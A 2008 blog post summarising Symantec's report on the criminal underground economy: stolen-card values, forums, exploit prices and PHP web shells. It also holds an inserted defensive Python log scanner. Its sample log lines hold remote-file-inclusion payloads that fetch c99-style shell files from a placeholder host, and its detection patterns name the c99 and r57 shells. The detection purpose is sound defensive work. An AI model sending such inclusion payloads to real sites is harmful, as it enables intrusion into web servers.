Tuesday, November 25, 2008

Symantec Released "Underground Economy Report"

Worth reading: http://www.symantec.com/business/theme.jsp?themeid=threatreport
Here are some of the interesting points:

Economic Figures:
- The underground economy has matured and now resembles a traditional business model.
- The estimated potential worth of all credit card information sold is $5.3 billion.
- "Reported" transactions using stolen credit cards were valued at $4.3 million.
- The value of "reported" advertised goods was over $276 million, with around 60% of that value from credit cards, 16% from identity theft, and 10% from selling server accounts. These numbers do not account for the subsequent use of the stolen information.
- Specialization in the services offered is an increasing trend, because of the complexity of the business model: tools need to be developed and then used by attackers, and the resulting goods and services must be marketed and traded.
- There is a certain amount of collaboration between different underground groups and organizations, especially at the administrative level.

Groups and Organizations:
- Channels used for communication: IRC rooms and web-based forums.
- IRC channels are used more than web forums.
- Almost 80% of IRC servers have a relatively short life span (7 to 30 days).
- Members of forums and IRC rooms change identities frequently.

Goods & Services:
- Almost 70% of goods and services sold are "credit card information", "financial accounts", and "spam & phishing information".
- Users also sell safe "drop" physical locations, used to receive physical goods without being traced.

Malicious code:
- Banking trojans, backdoors, password stealers, and all other types are focused mainly on evading antivirus detection.
- 163% increase in new malicious code in the 2nd half of 2007.
- The focus now is less on new malicious code than on packers and binders (which bind malicious code to a legitimate program).
- Binders and packers are the most costly tools, with a price range of $10-100.
- Exploits targeting a specific site (banking) are the most expensive, with an average price of $740.
- Remote File Include (RFI) exploits for 500 links cost $200.
- An e-commerce exploit (50 shop sites) is traded for $150.
- Browser exploits cost $37.
- The most common PHP shells used with RFI are the C99/R57 shells and a PHP spam mailer.
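A defender-side companion to the RFI and PHP shell bullets above: a small access-log scanner, added here as an example and not part of the Symantec report or of this post, that flags requests with the shape of an RFI attempt or a request for a known shell file name. The log lines are constructed, the addresses are documentation ranges, and the heuristics (a remote URL in a query parameter that ends in `?` or carries a NUL byte, a remote `.txt`/`.php` target, and the c99/r57 file names the post mentions) are assumptions chosen for illustration rather than rules from the report.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample lines in Common Log Format; the addresses are documentation
# ranges (RFC 5737) and none of this is real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Nov/2008:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 1532
203.0.113.8 - - [25/Nov/2008:10:01:05 +0000] "GET /index.php?page=http://198.51.100.9/shell.txt? HTTP/1.1" 200 88
203.0.113.9 - - [25/Nov/2008:10:01:09 +0000] "GET /cart.php?inc=ftp%3A%2F%2F198.51.100.9%2Fc99.txt%00 HTTP/1.1" 500 0
203.0.113.10 - - [25/Nov/2008:10:02:11 +0000] "GET /r57.php?act=cmd HTTP/1.1" 404 210
203.0.113.11 - - [25/Nov/2008:10:02:15 +0000] "GET /index.php?page=contact&ref=https://www.example.com/ HTTP/1.1" 200 1400
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# c99 and r57 are the shell names the post mentions; the pattern itself is a
# hypothetical heuristic and would need tuning against real traffic.
SHELL_NAME_RE = re.compile(r'(?:^|/)(?:c99|r57)[^/]*\.(?:php|txt)$', re.IGNORECASE)


def rfi_reasons(value):
    """Return the reasons one query-parameter value looks like an RFI payload.

    A bare remote URL on its own is not reported: referrer-style parameters
    carry URLs legitimately, so we require an extra include-style indicator.
    """
    reasons = []
    if not REMOTE_URL_RE.match(value):
        return reasons  # local paths and plain strings are out of scope here
    included = urlparse(value.replace('\x00', ''))
    if value.endswith('?'):
        reasons.append('remote URL with trailing ? (turns the local suffix into a query)')
    if '\x00' in value:
        reasons.append('remote URL with NUL byte (truncates the local suffix)')
    if re.search(r'\.(?:txt|php)$', included.path, re.IGNORECASE):
        reasons.append('remote URL points at a script-like file')
    if SHELL_NAME_RE.search(included.path):
        reasons.append('included file name matches a known web shell')
    return reasons


def scan_line(line):
    """Parse one access-log line; return a finding dict, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group('target')
    parts = urlparse(target)
    reasons = []
    if SHELL_NAME_RE.search(parts.path):
        reasons.append('request path names a known web shell')
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            for why in rfi_reasons(value):
                reasons.append(f'{name}: {why}')
    if not reasons:
        return None
    return {
        'ip': m.group('ip'),
        'status': int(m.group('status')),
        'target': target,
        'reasons': reasons,
    }


def scan_log(text):
    """Scan a whole log; return one finding per suspicious line, in log order."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding['ip'], finding['status'], finding['target'])
        for reason in finding['reasons']:
            print('   -', reason)
```

Three of the five constructed lines are reported: the `shell.txt?` include, the NUL-terminated `c99.txt` fetch, and the direct request for `r57.php`. The last line, which carries `https://www.example.com/` in a `ref` parameter, is deliberately left alone, because a remote URL by itself is common in legitimate parameters; the response status is kept in each finding so an analyst can separate a 200 (the include may have worked) from a 404 (a probe that found nothing).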

Payment System:
- Almost 65% of payments are made through online currency accounts, which convert money into electronic money backed by metals such as gold or silver.

